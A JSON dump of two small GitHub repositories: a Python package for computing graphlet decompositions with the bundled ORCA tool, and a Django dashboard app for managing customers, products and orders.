[ { "alpha_fraction": 0.4849527180194855, "alphanum_fraction": 0.5580395460128784, "avg_line_length": 29.605262756347656, "blob_id": "9286e538d33fe86e819ba29e5fbaccc3b18791b1", "content_id": "93ab4456e2290dcdb914792f566fcdbe118f1ddb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1163, "license_type": "permissive", "max_line_length": 117, "num_lines": 38, "path": "/graphlets/utils.py", "repo_name": "KirillShmilovich/graphlets", "src_encoding": "UTF-8", "text": "\"\"\"\nutil.py\n\nSome utility functions\n\"\"\"\nimport os\nimport numpy as np\nfrom sklearn.neighbors import BallTree, radius_neighbors_graph\nimport networkx as nx\n\n__all__ = [\"ORCA_PATH\", \"pbc\", \"orbits\", \"weights\", \"compute_graph\"]\n\nORCA_PATH = os.path.abspath(os.path.abspath(__file__) + \"../../../orca/orca.exe\")\n\n\ndef pbc(x0, x1, dims):\n delta = np.abs(x0 - x1)\n delta = np.where(delta > 0.5 * dims, delta - dims, delta)\n return np.sqrt((delta**2).sum(axis=-1))\n\n\norbits = np.array([\n 1, 2, 2, 2, 3, 4, 3, 3, 4, 3, 4, 4, 4, 4, 3, 4, 6, 5, 4, 5, 6, 6, 4, 4, 4, 5, 7, 4, 6, 6, 7, 4, 6, 6, 6, 5, 6, 7,\n 7, 5, 7, 6, 7, 6, 5, 5, 6, 8, 7, 6, 6, 8, 6, 9, 5, 6, 4, 6, 6, 7, 8, 6, 6, 8, 7, 6, 7, 7, 8, 5, 6, 6, 4\n],\n dtype=np.float)\nweights = 1. - np.log(orbits) / np.log(73.)\n\n\ndef compute_graph(X, r_cut, **kwargs):\n if kwargs[\"dims\"] is not None:\n BT = BallTree(X, metric=kwargs[\"metric\"], dims=kwargs[\"dims\"])\n else:\n BT = BallTree(X, metric=kwargs[\"metric\"])\n rng_con = radius_neighbors_graph(BT, r_cut, n_jobs=1, mode='connectivity')\n A = np.matrix(rng_con.toarray())\n G = nx.from_numpy_matrix(A)\n return G\n" }, { "alpha_fraction": 0.5851680040359497, "alphanum_fraction": 0.5894167423248291, "avg_line_length": 35.985713958740234, "blob_id": "0401b861d3473927714f9bf649eb73ef961d6a8c", "content_id": "2357fa806d57c5f99ca60ac7a082da239aa29136", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2589, "license_type": "permissive", "max_line_length": 128, "num_lines": 70, "path": "/graphlets/graphlets.py", "repo_name": "KirillShmilovich/graphlets", "src_encoding": "UTF-8", "text": "\"\"\"\ngraphlets.py\nPython package for computing graphlets\n\nHandles the primary functions\n\"\"\"\nfrom .utils import *\n\nimport numpy as np\nimport networkx as nx\nfrom joblib import Parallel, delayed\nimport subprocess\n\n__all__ = [\"Graphlets\"]\n\n\nclass Graphlets():\n def __init__(self, X, dims=None, metric=\"euclidean\"):\n \"X is (time_steps, num_structures, p_dims)\"\n self.X = X\n self.metric = metric\n self.depth = 5\n self.dims = dims\n \n def make_graphs(self, r_cut, n_jobs=-1):\n if n_jobs==1:\n return [compute_graph(x, r_cut, dims=self.dims, metric=self.metric) for x in self.X]\n else:\n return Parallel(n_jobs=n_jobs)(delayed(compute_graph)(x, r_cut, dims=self.dims, metric=self.metric) for x in self.X)\n\n def decompose(self, G, t):\n in_file = f\".edgelist_{t}.dat\"\n out_file = f\".edgelist_{t}.out\"\n\n f = open(in_file, \"wb\")\n f.write(f\"{nx.number_of_nodes(G)} {nx.number_of_edges(G)}\\n\".encode())\n nx.write_edgelist(G, f, data=False)\n f.close()\n\n command = [ORCA_PATH, \"node\", str(self.depth), in_file, out_file]\n subprocess.call(command, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n decomposition = np.loadtxt(out_file) * weights\n command = [\"rm\", out_file, in_file]\n subprocess.call(command, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n return decomposition\n\n def compute(self, r_cut, reduce=True, n_jobs=-1):\n self.G = self.make_graphs(r_cut=r_cut, n_jobs=n_jobs)\n if n_jobs==1:\n G_total = np.asarray([self.decompose(G,t) for t,G in enumerate(self.G)])\n else:\n G_total = np.asarray(Parallel(n_jobs=n_jobs)(delayed(self.decompose)(G,t) for t,G in enumerate(self.G)))\n\n if reduce is True:\n G_sum = G_total.sum(axis=1)\n return G_sum / G_sum.sum(axis=1, keepdims=True)\n else:\n return G_total\n\n def scan_r_cut(self, r_min, r_max, num=25, n_jobs=-1):\n r_scan = np.empty(shape=num)\n if n_jobs==1:\n for i,r in enumerate(np.linspace(r_min,r_max,num=num)):\n self.G = self.make_graphs(r_cut=r, n_jobs=n_jobs)\n r_scan[i] = np.asarray([nx.number_of_edges(G) for G in self.G]).mean()\n else: \n for i,r in enumerate(np.linspace(r_min,r_max,num=num)):\n self.G = self.make_graphs(r_cut=r, n_jobs=n_jobs)\n r_scan[i] = np.asarray(Parallel(n_jobs=n_jobs)(delayed(nx.number_of_edges)(G) for G in self.G)).mean()\n return r_scan\n" }, { "alpha_fraction": 0.7459283471107483, "alphanum_fraction": 0.7459283471107483, "avg_line_length": 24.58333396911621, "blob_id": "8424547fb5a89e2073fb883a1492880fe7aec99a", "content_id": "1a0f68beef6ee1f47d595234f2aa0f21799bcf0b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 307, "license_type": "permissive", "max_line_length": 74, "num_lines": 12, "path": "/graphlets/tests/test_graphlets.py", "repo_name": "KirillShmilovich/graphlets", "src_encoding": "UTF-8", "text": "\"\"\"\nUnit and regression test for the graphlets package.\n\"\"\"\n\n# Import package, test suite, and other packages as needed\nimport graphlets\nimport pytest\nimport sys\n\ndef test_graphlets_imported():\n \"\"\"Sample test, will always pass so long as import statement worked\"\"\"\n assert \"graphlets\" in sys.modules\n" }, { "alpha_fraction": 0.6551724076271057, "alphanum_fraction": 0.6551724076271057, "avg_line_length": 20.5, "blob_id": "cc733a4786d6bf223081e2f3b0b89e322e616a4d", "content_id": "6e0d702a28b81efef9f9eab2db5bc446a6b69c0f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 87, "license_type": "permissive", "max_line_length": 52, "num_lines": 4, "path": "/docs/getting_started.rst", "repo_name": "KirillShmilovich/graphlets", "src_encoding": "UTF-8", "text": "Getting Started\n===============\n\nThis page details how to get started with graphlets. \n" }, { "alpha_fraction": 0.7207341194152832, "alphanum_fraction": 0.7440476417541504, "avg_line_length": 29.545454025268555, "blob_id": "2413ed072403e69b91dbe9da782a5c6e1a08ff04", "content_id": "25f557955fac67d30806e80f4f18ed3b40208292", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2018, "license_type": "permissive", "max_line_length": 135, "num_lines": 66, "path": "/README.md", "repo_name": "KirillShmilovich/graphlets", "src_encoding": "UTF-8", "text": "graphlets\n==============================\n[//]: # (Badges)\n[![Build Status](https://travis-ci.org/KirillShmilovich/graphlets.svg?branch=master)](https://travis-ci.org/KirillShmilovich/graphlets)\n\nSmall package for performing graphlet decomposition.\n\n## Dependencies \n\nMake sure you have the following installed on your machine.\n\n- A C++ compiler supporting C++11\n- [scikit-learn](http://scikit-learn.org/stable/install.html)\n- [joblib](https://joblib.readthedocs.io/en/latest/installing.html)\n- [numpy](https://docs.scipy.org/doc/numpy/user/install.html)\n- [networkx](https://networkx.github.io/documentation/stable/install.html)\n\n## Installation \n\nWith all the dependencies installed you can install the package by running: \n\n```bash\n$ git clone https://github.com/KirillShmilovich/graphlets\n$ cd graphlets\n$ pip install -e .\n```\n\n(Note the `-e` is required to ensure `orca/orca.cpp` compiles properly)\n\n## Usage \n\nThe below examples shows how to compute a graphlet decomposition on a randomly generated set of points.\n\n```python \nimport graphlets\nimport numpy as np\n\n# Create a randomly generaterd data set with dimensions (n_frames, n_objects, n_dims)\na = np.random.rand(1000, 100, 3)\n\n# Instantiate a graphlet object using `a`\nG = graphlets.Graphlets(a)\n\n# Compute a graphlet decomposition, by default performing a\n# node reduction outputing a vector of graphlet frequencies \ndecomp = G.compute(r_cut = 0.1)\n```\n\n## Acknowledgements \n\nThis package is shipped with the C++ code to perform graphlet decomposition available here:\n\n- ORCA (https://github.com/thocevar/orca)\n\nProject based on the \n[Computational Molecular Science Python Cookiecutter](https://github.com/molssi/cookiecutter-cms) version 1.0.\n\n## References \n\n[1] Pržulj N, Biological Network Comparison Using Graphlet Degree Distribution, Bioinformatics 2007, 23:e177-e183.\n\n[2] Tomaž Hočevar, Janez Demšar, A combinatorial approach to graphlet counting, Bioinformatics, Volume 30, Issue 4, 15 February 2014, Pages 559–565\n\n### Copyright\n\nCopyright (c) 2019, Kirill Shmilovich\n" } ]
5
Tarunpanyam/pycharm
https://github.com/Tarunpanyam/pycharm
442d55af72ea22759ffe21d469c66484c4b156f8
d5062ced832ffd0cf97a1765a6547328494e4387
0972ae12b2178c0369721b8615e2ad4561864ea6
refs/heads/master
2022-04-24T10:48:27.356024
2020-04-25T08:07:05
2020-04-25T08:07:05
258,718,989
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5775943994522095, "alphanum_fraction": 0.5864804983139038, "avg_line_length": 29.84848403930664, "blob_id": "ad8594175f21ae9b9e22dc9a1b2512697081e150", "content_id": "92bfb0a6766a70eda28f0ee7fa836d48f8ffeccc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3151, "license_type": "no_license", "max_line_length": 95, "num_lines": 99, "path": "/scrap.py", "repo_name": "Tarunpanyam/pycharm", "src_encoding": "UTF-8", "text": "import lxml.html\r\nimport urllib.request\r\nimport pprint\r\nimport http.cookiejar as cookielib\r\nfrom io import BytesIO\r\nfrom PIL import Image\r\nimport pytesseract\r\nimport sys\r\nimport shutil\r\nimport threading\r\nfrom BeautifulSoup import BeautifulSoup as soup\r\ndef form_parsing(html):\r\n tree = lxml.html.fromstring(html)\r\n data = {}\r\n for e in tree.cssselect('form input'):\r\n if e.get('name'):\r\n data[e.get('name')] = e.get('value')\r\n return data\r\ndef load_captcha(html):\r\n tree = lxml.html.fromstring(html)\r\n img_data = tree.cssselect('div#recaptcha img')[0].get('src')\r\n img_data = img_data.partition(',')[-1]\r\n binary_img_data = img_data.decode('base64')\r\n file_like = BytesIO(binary_img_data)\r\n img = Image.open(file_like)\r\n return img\r\nresponse = urllib.request.urlopen('https://parivahan.gov.in/rcdlstatus/?pur_cd=101')\r\nhtml = response.read()\r\ntext = html.decode()\r\n# geting the no of forms to fill\r\nform = form_parsing(html)\r\npprint.pprint(form)\r\n# delling with cpacha image\r\nimg = get_captcha(html)\r\nimg.save('captcha_original.png')\r\ngray = img.convert('L')\r\ngray.save('captcha_gray.png')\r\nbw = gray.point(lambda x: 0 if x < 1 else 255, '1')\r\nbw.save('captcha_thresholded.png')\r\ns=pytesseract.image_to_string(bw)\r\ndl=input(' Enter your Driving License Number')\r\ndb=input('Enter your Date of Birth in dd-mm-yyyy format')\r\nparameters = {'Driving Licence No.':dl, 'Date Of Birth': db,'Enter Verification Code': s}\r\nlink = requests.post('https://parivahan.gov.in/rcdlstatus/?pur_cd=101, data = parameters)\r\nl=requests.get( link )\r\na=m(l)\r\n# deling with licence picture\r\ndef m(l):\r\n html = l\r\n tags = filter( html )\r\n for tag in tags:\r\n src = tag.get( \"src\" )\r\n if src:\r\n src = re.match( r\"((?:https?:\\/\\/.*)?\\/(.*\\.(?:png|jpg)))\", src )\r\n if src:\r\n (link, name) = src.groups()\r\n if not link.startswith(\"http\"):\r\n link = \"https://www.drivespark.com\" + link\r\n _t = threading.Thread( target=requesthandle, args=(link, name.split(\"/\")[-1]) )\r\n _t.daemon = True\r\n _t.start()\r\n\r\n while THREAD_COUNTER >= THREAD_MAX:\r\n pass\r\n\r\n while THREAD_COUNTER > 0:\r\n pass\r\n\r\nTHREAD_COUNTER = 0\r\nTHREAD_MAX = 5\r\n\r\ndef get_source( link ):\r\n r = requests.get( link )\r\n if r.status_code == 200:\r\n return soup( r.text )\r\n else:\r\n sys.exit( \"[~] Invalid Response Received.\" )\r\n\r\ndef filter( html ):\r\n imgs = html.findAll( \"img\" )\r\n if imgs:\r\n return imgs\r\n else:\r\n sys.exit(\"[~] No images detected on the page.\")\r\n\r\ndef requesthandle( link, name ):\r\n global THREAD_COUNTER\r\n THREAD_COUNTER += 1\r\n try:\r\n r = requests.get( link, stream=True )\r\n if r.status_code == 200:\r\n r.raw.decode_content = True\r\n f = open( name, \"wb\" )\r\n shutil.copyfileobj(r.raw, f)\r\n f.close()\r\n print (\"[*] Downloaded Image: %s\" % name)\r\n except Exception, error:\r\n print (\"[~] Error Occured with %s : %s\" % (name, error))\r\n THREAD_COUNTER -= 1" } ]
1
codingXllama/Image-Viewer
https://github.com/codingXllama/Image-Viewer
bf7eecdc7c86e6410f9aca669f727dc7d02559a7
f536ab51582e863fc05eea06e88f5760b7aac90b
2806f0fbc0950cd06146c1389dd3c87b36bfffab
refs/heads/master
2020-06-23T05:13:03.145186
2019-07-24T00:10:16
2019-07-24T00:10:16
198,526,387
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7149122953414917, "alphanum_fraction": 0.7438596487045288, "avg_line_length": 19.375, "blob_id": "a492b6fb324c6ef40fb06f097146feda7b11f884", "content_id": "bed8666e736080239e6996dc2834661f8dd2ae27", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1140, "license_type": "no_license", "max_line_length": 81, "num_lines": 56, "path": "/app.py", "repo_name": "codingXllama/Image-Viewer", "src_encoding": "UTF-8", "text": "from tkinter import *\n# Importing Python Image Library\nfrom PIL import ImageTk,Image\n\nfrom PIL import ImageTk, Image\n\nwindow =Tk()\nwindow.title(\"Nature Image Viewer\")\n# window.geometry(\"800x600\")\n# logo=PhotoImage(file=\"x.xbm\")\nlogo= window.iconbitmap(\"@/home/x/Documents/GithubFiles/Image Viewer App /x.xbm\")\n# window.call('wm','iconphoto',window._w,logo)\n\n\nimg1=ImageTk.PhotoImage(Image.open(\"images/bg1.jpg\"))\nimg2=ImageTk.PhotoImage(Image.open(\"images/bg2.jpg\"))\nimg3=ImageTk.PhotoImage(Image.open(\"images/bg3.jpg\"))\nimg4=ImageTk.PhotoImage(Image.open(\"images/bg4.jpg\"))\nimg5=ImageTk.PhotoImage(Image.open(\"images/bg5.jpg\"))\n\n# Creating image list to store all images\nbgImageCollection=[img1,img2,img3,img4,img5]\nmyImg1_Label=Label(image=img1)\nmyImg1_Label.grid(row=0,column=0,columnspan=3)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# Creating Buttons\nbackBtn=Button(window,text=\"<<\",bg=\"cyan\")\nexitBtn = Button(window, text=\"Exit Program\",command=window.quit, bg=\"red\")\nforwardBtn=Button(window,text=\">>\", bg=\"green\")\n\n\n# Adding the Button onto the window\nbackBtn.grid(row=1,column=0)\nexitBtn.grid(row=1,column=1)\nforwardBtn.grid(row=1,column=2)\n\n\nmainloop()" } ]
1
NaraJeamfry/pastasalsa
https://github.com/NaraJeamfry/pastasalsa
62f782ffa0093bd7a2e4d49a4771a7b3c2d7d35a
e98420f1022f3014e582e0d4e9453aebe5ce2e77
46fb0a814c3502d6064dd813791d471b3b2aba35
refs/heads/master
2020-04-26T14:08:22.751329
2019-03-03T18:48:50
2019-03-03T18:48:50
173,602,272
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7396449446678162, "alphanum_fraction": 0.7514792680740356, "avg_line_length": 32.79999923706055, "blob_id": "fe5c505a395e77fdfb368bf6a605e2e4d5094dc2", "content_id": "07a9adcb9767692ece62579402023e89fb0d9972", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 169, "license_type": "permissive", "max_line_length": 106, "num_lines": 5, "path": "/pasta/models.py", "repo_name": "NaraJeamfry/pastasalsa", "src_encoding": "UTF-8", "text": "from django.db import models\n\n\nclass PastaType(models.Model):\n name = models.CharField(verbose_name='Pasta Name', max_length=50, null=False, blank=True, unique=True)\n" }, { "alpha_fraction": 0.7411764860153198, "alphanum_fraction": 0.7411764860153198, "avg_line_length": 16, "blob_id": "58730e0d9d617c5fafc6aafd7413e73d021117d9", "content_id": "9903e473624292ed0f70c808050e1eaf1c6e305e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 85, "license_type": "permissive", "max_line_length": 33, "num_lines": 5, "path": "/pasta/apps.py", "repo_name": "NaraJeamfry/pastasalsa", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\n\n\nclass PastaConfig(AppConfig):\n name = 'pasta'\n" }, { "alpha_fraction": 0.8166666626930237, "alphanum_fraction": 0.8166666626930237, "avg_line_length": 29, "blob_id": "19eccdc9f942bd32c82b5c04c1fba0f0961ca3b0", "content_id": "5751bbc1f041aa67b0331b4913ced2cd9f626141", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 60, "license_type": "permissive", "max_line_length": 46, "num_lines": 2, "path": "/README.md", "repo_name": "NaraJeamfry/pastasalsa", "src_encoding": "UTF-8", "text": "# pastasalsa\nRecomendador de salsas para cada tipo de pasta\n" } ]
3
AhmedFahmy-cyber/dash
https://github.com/AhmedFahmy-cyber/dash
8486927a8ac527f349fb4b42b1a5cb6e9e5129a3
be249ade7e07c8b917150fbe831da2d485bbe7fb
509ffa9697ac3cecce66741e5254d31ce21d0550
refs/heads/master
2022-12-16T19:39:58.782920
2020-09-22T14:02:45
2020-09-22T14:02:45
297,626,490
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6141610145568848, "alphanum_fraction": 0.6141610145568848, "avg_line_length": 25.963350296020508, "blob_id": "39ec4bc97ed45e4239e0125ca0d7c10b8a666ea2", "content_id": "a000f118482b770b442a1d9ab089f8af57d5379b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5155, "license_type": "no_license", "max_line_length": 83, "num_lines": 191, "path": "/accounts/views.py", "repo_name": "AhmedFahmy-cyber/dash", "src_encoding": "UTF-8", "text": "from django.shortcuts import render,redirect\nfrom .forms import Orderform , Customerform ,Loginform ,Registerform\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate , login , logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin \nfrom django.views.generic import TemplateView \n\nfrom .models import *\n\n\n# Create your views here.\ndef registerPage(request):\n\n form = Registerform()\n if request.method == 'POST':\n form =Registerform(request.POST)\n if form.is_valid():\n user=form.save()\n username = form.cleaned_data.get('username') \n messages.success(request , 'Acount has been created for :' + username) \n return redirect('login')\n \n\n cotext ={'form':form} \n\n return render (request ,'accounts/register.html',cotext)\n\ndef loginPage(request):\n\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password')\n user = authenticate (request ,username = username , password = password)\n if user is not None:\n \n login(request,user)\n\n return redirect ('dashboard')\n else:\n messages.info(request , 'username or password not correct ' ) \n cotext ={}\n\n return render (request ,'accounts/login.html',cotext)\ndef logOutuser(request):\n \n logout(request)\n \n return redirect ('login') \n\n \n@login_required\ndef home(request):\n\n orders = Order.objects.all()\n customers = Customer.objects.all()\n total_orders = orders.count()\n customers_total = customers.count()\n Orders_Delivered = orders.filter(status='Deliverd').count()\n Orders_Pending = orders.filter(status='Pending').count()\n \n context = {\n 'customers': customers,\n 'orders':orders,\n 'Orders_Delivered':Orders_Delivered,\n 'Orders_Pending':Orders_Pending,\n 'customers_total':customers_total,\n 'total_orders':total_orders,\n }\n return render(request , 'accounts/dashboard.html' ,context)\n\n# class Home(LoginRequiredMixin,TemplateView):\n# template_name = 'accounts/dashboard.html' \n\n@login_required\ndef products(request):\n products = Product.objects.all()\n context = {\n 'products': products,\n }\n return render(request , 'accounts/products.html',context)\n\n# class Products(LoginRequiredMixin,TemplateView):\n# template_name = 'accounts/products.html' \n\ndef customers(request , pk_test):\n customer = Customer.objects.get(id=pk_test)\n orders = customer.order_set.all()\n order_count = orders.count()\n context = {\n 'customer': customer,\n 'orders':orders,\n 'order_count':order_count,\n }\n return render(request , 'accounts/customers.html',context)\n\ndef creatorder(request):\n\n form = Orderform()\n if request.method == 'POST':\n form = Orderform(request.POST)\n if form.is_valid():\n form.save()\n return redirect('dashboard')\n \n context = {\n 'form':form,\n \n }\n return render(request , 'accounts/creat_form.html',context)\n\n\ndef placeNeworder(request , pk):\n customer = Customer.objects.get(id=pk)\n form = Orderform(initial={'customer':customer})\n if request.method == 'POST':\n form = Orderform(request.POST)\n if form.is_valid():\n form.save()\n return redirect('dashboard')\n \n context = {\n 'form':form,\n \n }\n return render(request , 'accounts/creat_form.html',context)\n\n\n\n\ndef creatcustomer(request):\n \n form = Customerform()\n if request.method == 'POST':\n form = Customerform(request.POST)\n if form.is_valid():\n form.save()\n return redirect('dashboard')\n \n context = {\n 'form':form,\n \n }\n return render(request , 'accounts/creat_customer.html',context)\n\ndef updatecustomer(request , pk):\n customer = Customer.objects.get(id=pk)\n form = Customerform(instance=customer)\n \n if request.method == 'POST':\n form = Customerform(request.POST,instance=customer)\n if form.is_valid():\n form.save()\n return redirect('dashboard')\n \n context = {\n 'customer':customer,\n 'form':form,\n\n }\n return render(request , 'accounts/creat_customer.html',context) \n\ndef updateorder(request , pk):\n order = Order.objects.get(id=pk)\n form = Orderform(instance=order)\n \n if request.method == 'POST':\n form = Orderform(request.POST,instance=order)\n if form.is_valid():\n form.save()\n return redirect('dashboard')\n \n context = {\n 'order':order,\n 'form':form,\n\n }\n return render(request , 'accounts/creat_form.html',context) \n\n\ndef deleteorder(request , pk):\n order = Order.objects.get(id=pk)\n if request.method == 'POST':\n order.delete()\n return redirect('dashboard')\n \n context = {\n 'item':order,\n\n }\n return render(request , 'accounts/delete.html',context) \n\n" }, { "alpha_fraction": 0.6201834678649902, "alphanum_fraction": 0.6366972327232361, "avg_line_length": 24.952381134033203, "blob_id": "cc867de010728e1b3b83d0321dfd1dd21f2e945a", "content_id": "2bcffd9991b820092b8406a7104aa0f564440bfd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1635, "license_type": "no_license", "max_line_length": 88, "num_lines": 63, "path": "/accounts/models.py", "repo_name": "AhmedFahmy-cyber/dash", "src_encoding": "UTF-8", "text": "from django.db import models\n\n# Create your models here.\n\n\nclass Customer(models.Model):\n name = models.CharField(max_length=200 , null = True)\n email = models.CharField(max_length=200 , null = True) \n phone = models.CharField(max_length=200 , null = True)\n date_created = models.DateTimeField(auto_now_add=True,null=True)\n\n def __str__(self):\n\n return self.name\n\n\n\nclass Tag(models.Model):\n name = models.CharField(max_length=200 , null = True)\n\n def __str__(self):\n\n return self.name\n\n\nclass Product(models.Model):\n\n CATEGORY = (\n ('Indoor','Indoor'),\n ('Outdoor','Outdoor'),\n )\n name = models.CharField(max_length=200 , null = True)\n price = models.FloatField(max_length=200 , null = True)\n describtion = models.CharField(max_length=200 , null = True , blank=True) \n category = models.CharField(max_length=200 , choices = CATEGORY , null = True)\n date_created = models.DateTimeField(auto_now_add=True,null=True)\n tags = models.ManyToManyField(Tag)\n\n def __str__(self):\n\n return self.name\n\n\n\n\nclass Order(models.Model):\n\n STATUS = (\n ('Pending','Pending'),\n ('Deliverd','Deliverd'),\n ('Out for delivery','Out for delivery'), \n\n )\n\n\n customer=models.ForeignKey(Customer,null=True , on_delete=models.SET_NULL)\n product=models.ForeignKey(Product,null=True , on_delete=models.SET_NULL)\n status = models.CharField(max_length=200 , null = True , choices = STATUS ) \n date_created = models.DateTimeField(auto_now_add=True,null=True)\n\n def __str__(self):\n \n return self.product.name\n" }, { "alpha_fraction": 0.6387596726417542, "alphanum_fraction": 0.6387596726417542, "avg_line_length": 20.5, "blob_id": "993182f6d3614db70fcfe81c56e1a1e3c6c71e43", "content_id": "41ecba1cc524ab0e6252708bfd6ced8703b5b409", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 645, "license_type": "no_license", "max_line_length": 63, "num_lines": 30, "path": "/accounts/forms.py", "repo_name": "AhmedFahmy-cyber/dash", "src_encoding": "UTF-8", "text": "from django.forms import ModelForm\nfrom .models import Order ,Customer \nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserCreationForm\n\nclass Orderform(ModelForm):\n\n class Meta:\n model = Order\n fields = '__all__'\n\n\nclass Customerform(ModelForm):\n \n class Meta:\n model = Customer\n fields = ['name','phone','email']\n\n\nclass Registerform(UserCreationForm):\n \n class Meta:\n model = User\n fields = ['username','email','password1','password2']\n\nclass Loginform(ModelForm):\n \n class Meta:\n model = User\n fields = ['username','password']\n" }, { "alpha_fraction": 0.6822977662086487, "alphanum_fraction": 0.6822977662086487, "avg_line_length": 49.117645263671875, "blob_id": "3674a51c5f11672721ee064f122f1e8251d14088", "content_id": "c862c561c90fefe926116e224dc79824b785c98e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 853, "license_type": "no_license", "max_line_length": 83, "num_lines": 17, "path": "/accounts/urls.py", "repo_name": "AhmedFahmy-cyber/dash", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('register/', views.registerPage,name=\"register\"),\n path('login/', views.loginPage,name=\"login\"),\n path('logout/', views.logOutuser,name=\"logout\"),\n path('', views.home ,name=\"dashboard\"),\n path('products/', views.products ,name=\"products\"),\n path('customer/<str:pk_test>/', views.customers,name=\"customer\"),\n path('creat_order/', views.creatorder,name=\"creat_order\"),\n path('creat_customer/', views.creatcustomer,name=\"creat_customer\"),\n path('update_order/<str:pk>/', views.updateorder,name=\"update_order\"),\n path('update_customer/<str:pk>/', views.updatecustomer,name=\"update_customer\"),\n path('place_new_order/<str:pk>/', views.placeNeworder,name=\"place_new_order\"),\n path('delete_order/<str:pk>/', views.deleteorder,name=\"delete_order\"),\n]\n\n" } ]
4